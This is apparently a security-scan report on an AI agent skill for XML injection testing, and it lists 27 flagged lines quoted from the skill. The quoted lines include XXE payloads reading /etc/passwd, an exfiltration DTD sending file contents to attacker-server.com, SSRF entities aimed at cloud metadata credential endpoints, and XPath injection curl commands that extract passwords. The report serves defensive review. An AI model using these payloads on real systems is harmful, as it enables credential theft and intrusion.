
testing-for-xml-injection-vulnerabilities

Tests web applications for XML injection vulnerabilities, including XXE and XPath injection, to enhance security and prevent data exposure.

Security score: 0/100

The testing-for-xml-injection-vulnerabilities skill was audited on Jun 5, 2026 and we found 27 security issues across 4 threat categories, including 1 critical. Review the findings below before installing.

Categories Tested

Security Issues

[medium] line 56 - Curl to non-GitHub URL
    Source: SKILL.md:56  curl -s http://target.com/service?wsdl

[medium] line 59 - Curl to non-GitHub URL
    Source: SKILL.md:59  curl -X POST http://target.com/api/data \

[medium] line 142 - Curl to non-GitHub URL
    Source: SKILL.md:142  curl "http://target.com/search?query=' or '1'='1"

[medium] line 145 - Curl to non-GitHub URL
    Source: SKILL.md:145  curl -X POST http://target.com/login \

[medium] line 149 - Curl to non-GitHub URL
    Source: SKILL.md:149  curl "http://target.com/search?query=' or 1=1 or ''='"

[medium] line 152 - Curl to non-GitHub URL
    Source: SKILL.md:152  curl "http://target.com/search?query=' or string-length(//user[1]/password)=8 or ''='"

[medium] line 153 - Curl to non-GitHub URL
    Source: SKILL.md:153  curl "http://target.com/search?query=' or substring(//user[1]/password,1,1)='a' or ''='"

[high] line 72 - Access to /etc/passwd
    Source: SKILL.md:72  <!ENTITY xxe SYSTEM "file:///etc/passwd">

[high] line 86 - Access to /etc/passwd
    Source: SKILL.md:86  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">

[critical] line 201 - Access to /etc/passwd
    Source: SKILL.md:201  1. **File Disclosure** — Read sensitive server files (/etc/passwd, web.config) through classic XXE entity injection in XML input fields

[high] line 218 - Access to /etc/passwd
    Source: SKILL.md:218  | 1 | XXE File Read | POST /api/import | SYSTEM "file:///etc/passwd" | Local File Disclosure |

[high] line 201 - Prompting for password/secret input
    Source: SKILL.md:201  1. **File Disclosure** — Read sensitive server files (/etc/passwd, web.config) through classic XXE entity injection in XML input fields

[low] line 56 - External URL reference
    Source: SKILL.md:56  curl -s http://target.com/service?wsdl

[low] line 59 - External URL reference
    Source: SKILL.md:59  curl -X POST http://target.com/api/data \

[low] line 96 - External URL reference
    Source: SKILL.md:96  <!ENTITY % xxe SYSTEM "http://attacker-server.com/xxe.dtd">

[low] line 103 - External URL reference
    Source: SKILL.md:103  <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker-server.com/?data=%file;'>">

[low] line 110 - External URL reference
    Source: SKILL.md:110  <!ENTITY xxe SYSTEM "http://xxe-test.burpcollaborator.net">

[low] line 120 - External URL reference
    Source: SKILL.md:120  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">

[low] line 127 - External URL reference
    Source: SKILL.md:127  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

[low] line 134 - External URL reference
    Source: SKILL.md:134  <!ENTITY xxe SYSTEM "http://internal-server:8080/">

[low] line 142 - External URL reference
    Source: SKILL.md:142  curl "http://target.com/search?query=' or '1'='1"

[low] line 145 - External URL reference
    Source: SKILL.md:145  curl -X POST http://target.com/login \

[low] line 149 - External URL reference
    Source: SKILL.md:149  curl "http://target.com/search?query=' or 1=1 or ''='"

[low] line 152 - External URL reference
    Source: SKILL.md:152  curl "http://target.com/search?query=' or string-length(//user[1]/password)=8 or ''='"

[low] line 153 - External URL reference
    Source: SKILL.md:153  curl "http://target.com/search?query=' or substring(//user[1]/password,1,1)='a' or ''='"

[low] line 211 - External URL reference
    Source: SKILL.md:211  - **Target**: http://target.com/api/xml-endpoint

[low] line 220 - External URL reference
    Source: SKILL.md:220  | 3 | SSRF via XXE | POST /api/parse | SYSTEM "http://169.254.169.254/" | Cloud Credential Theft |
Scanned on Jun 5, 2026
GitHub Stars: 8
Category: development
Updated: June 15, 2026
26zl/cybersec-toolkit